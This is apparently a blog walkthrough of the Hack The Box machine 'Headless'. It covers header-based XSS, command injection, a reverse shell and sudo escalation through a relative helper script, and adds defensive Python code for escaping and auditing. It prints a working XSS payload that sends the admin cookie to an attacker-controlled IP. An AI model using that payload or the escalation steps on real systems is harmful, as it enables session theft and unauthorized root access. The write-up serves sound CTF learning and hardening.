Headless | Hack The Box Walk through
Hello Guys,
It's me, Bikram Kharal, back on Medium to write about the seasonal machine from Hack The Box.
Initial Enumeration
First of all, I ran a simple nmap scan to enumerate the open ports on the box.
nmap -sC -sV Machine_IP -T4
The scan showed that ports 22 and 5000 are open.
Port 5000 was running a web service. Visiting it, we got an interface like the one below:
Clicking on the For questions button, we got a form to contact support.
Looking at this page, I started submitting random values and intercepted the requests with Burp Suite.
When I added a simple XSS payload in the message field, we were prompted with 'Hacking Attempt Detected'.
I suspected that this web service was vulnerable to XSS, but none of the values sent via the contact form were reflected anywhere.
After a few minutes of research, I tried injecting the XSS payload in the User-Agent header, and surprisingly it fired.
Now we needed to construct an XSS payload to steal the admin's cookie.
I added the payload below in the User-Agent header and started my Python HTTP server to catch the callback.
<img src=x onerror=document.location="http://10.10.14.57:8000/?c="+document.cookie>
And finally we got the admin cookie.
Using the admin cookie, I brute-forced directories again with ffuf to see if we could find a useful path.
Yes, we found the /dashboard path using the admin cookie.
I accessed the dashboard, and the interface looked like this:
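Before moving on, here is an added example of the two defensive points this step exposes; it is my own illustration, not code from the box or from Hack The Box. The 'Hacking Attempt Detected' screen only inspected the form body, and the User-Agent header was later rendered into an admin-viewed page without escaping. The request structure, the form field name, the hostname and the marker regex are assumptions; the payload is the one from the writeup.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample request: the message body is harmless, while the
# User-Agent header carries the cookie-stealing payload from the writeup.
SAMPLE_REQUEST = {
    "form": {"message": "hello support"},            # field name is an assumption
    "headers": {
        "Host": "machine.htb:5000",                  # assumed hostname
        "User-Agent": '<img src=x onerror=document.location="http://10.10.14.57:8000/?c="+document.cookie>',
    },
}

# Rough markers a "Hacking Attempt Detected" screen might look for (assumption).
XSS_MARKERS = re.compile(r"<\s*(script|img|svg|iframe)\b|\bon[a-z]+\s*=|javascript:",
                         re.IGNORECASE)


def find_suspicious_fields(request: dict, include_headers: bool = True) -> list[str]:
    """Return every form field and (optionally) header that trips the markers.
    Screening only the form body, as the app apparently did, misses payloads
    smuggled in headers that get rendered to an admin later."""
    hits = [f"form:{k}" for k, v in request["form"].items() if XSS_MARKERS.search(v)]
    if include_headers:
        hits += [f"header:{k}" for k, v in request["headers"].items()
                 if XSS_MARKERS.search(v)]
    return hits


def render_support_row_unsafe(request: dict) -> str:
    """Vulnerable pattern: header text concatenated straight into the admin's HTML."""
    return (f"<tr><td>{request['form']['message']}</td>"
            f"<td>{request['headers']['User-Agent']}</td></tr>")


def render_support_row_safe(request: dict) -> str:
    """Hardened: every attacker-controlled value is HTML-escaped before rendering."""
    msg = html.escape(request["form"]["message"], quote=True)
    ua = html.escape(request["headers"]["User-Agent"], quote=True)
    return f"<tr><td>{msg}</td><td>{ua}</td></tr>"


class _TagCollector(HTMLParser):
    """Collects the start tags an HTML parser actually sees in a fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def rendered_tags(fragment: str) -> list[str]:
    """Tags a browser-like parser would see; an escaped payload yields no <img>."""
    p = _TagCollector()
    p.feed(fragment)
    p.close()
    return p.tags


if __name__ == "__main__":
    print("body-only screen :", find_suspicious_fields(SAMPLE_REQUEST, include_headers=False))
    print("full screen      :", find_suspicious_fields(SAMPLE_REQUEST))
    print("unsafe tags      :", rendered_tags(render_support_row_unsafe(SAMPLE_REQUEST)))
    print("safe tags        :", rendered_tags(render_support_row_safe(SAMPLE_REQUEST)))
```

The body-only screen returns nothing for this request, the header-aware screen flags User-Agent, and the parser sees an img tag only in the unescaped rendering. Escaping on output is the fix that actually matters; the keyword screen is a bonus signal for logging and alerting, not a substitute.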
I clicked on the Generate Report button and intercepted the request with the Burp proxy.
I tried a command injection payload first, and we got the response immediately.
Now it's time to get a reverse shell :)
Going one directory back, we got user.txt.
Post Exploitation
I tried basic Linux privilege escalation techniques. Using sudo -l,
we found that `/usr/bin/syscheck` can be run with sudo without a password.
Reading the code of the syscheck file, I found that it runs an `initdb.sh` file with sudo privileges.
I instantly created a new file called initdb.sh containing a reverse shell payload, ran /usr/bin/syscheck,
and we got our shell with sudo privileges.
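As an added example from the defender's side (my own code, not the box's syscheck script, which I am not reproducing), the following audit scans a script that sudo lets unprivileged users run and flags every helper it invokes by a relative path, by a bare name resolved through PATH, or at a writable location. That is exactly the class of misconfiguration used above. The sample script contents, including the `./initdb.sh` line, are constructed assumptions.

```python
import os
import re
import shlex
import stat

# Constructed stand-in for a helper that sudo lets an unprivileged user run.
# The box's real syscheck is not reproduced; the relative "./initdb.sh" call
# models the pattern described above (a helper resolved from the caller's cwd).
SAMPLE_SYSCHECK = """#!/bin/bash
# assumed contents, for illustration only
if [ "$EUID" -ne 0 ]; then
    exit 1
fi
/usr/bin/df -h /
./initdb.sh
echo "System check done"
"""

KEYWORDS = {"if", "then", "elif", "else", "fi", "for", "in", "do", "done",
            "while", "until", "case", "esac", "!"}
BUILTINS = {"echo", "exit", "export", "set", "cd", "return", "local",
            "read", "shift", "unset"}
TESTS = {"[", "[[", "test"}


def extract_commands(script_text: str) -> list[str]:
    """Return the external command word of each simple statement (best effort).
    Comments, shell keywords, builtins, test brackets and variable
    assignments are skipped; quoting is handled by shlex per statement."""
    cmds = []
    for raw in script_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        for stmt in re.split(r"\|\||&&|;|\|", line):
            try:
                words = shlex.split(stmt)
            except ValueError:
                continue
            for word in words:
                if word in KEYWORDS or re.match(r"^\w+=", word):
                    continue
                if word in BUILTINS or word in TESTS:
                    break
                cmds.append(word)
                break
    return cmds


def group_or_world_writable(path: str) -> bool:
    """True when the file at an absolute path can be modified by non-owners."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_sudo_script(script_text: str, writable=group_or_world_writable) -> list[tuple[str, str]]:
    """Flag each invoked command whose resolution an unprivileged caller can influence."""
    findings = []
    for cmd in extract_commands(script_text):
        if cmd.startswith("/"):
            if writable(cmd):
                findings.append((cmd, "absolute path, but group/world-writable"))
        elif "/" in cmd:
            findings.append((cmd, "relative path: resolved from the caller's working directory"))
        else:
            findings.append((cmd, "bare name: resolved via PATH; check sudo secure_path"))
    return findings


def audit_file(path: str) -> list[tuple[str, str]]:
    """Audit a real script on disk, e.g. one listed in the output of sudo -l."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_sudo_script(fh.read())


if __name__ == "__main__":
    # The writable check is stubbed so the sample runs without touching the filesystem.
    for cmd, why in audit_sudo_script(SAMPLE_SYSCHECK, writable=lambda p: False):
        print(f"{cmd}: {why}")
```

On the sample script the only finding is the relative `./initdb.sh` call, which is the fix to make: give every helper an absolute path, keep it root-owned and not writable by others, and have the sudo rule point at a script that does the same. The parser is intentionally simple and will not follow sourced files, functions or heredocs, so treat it as a first pass rather than a complete review.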
Thank you all for reading.
Until next time, Happy Hacking :)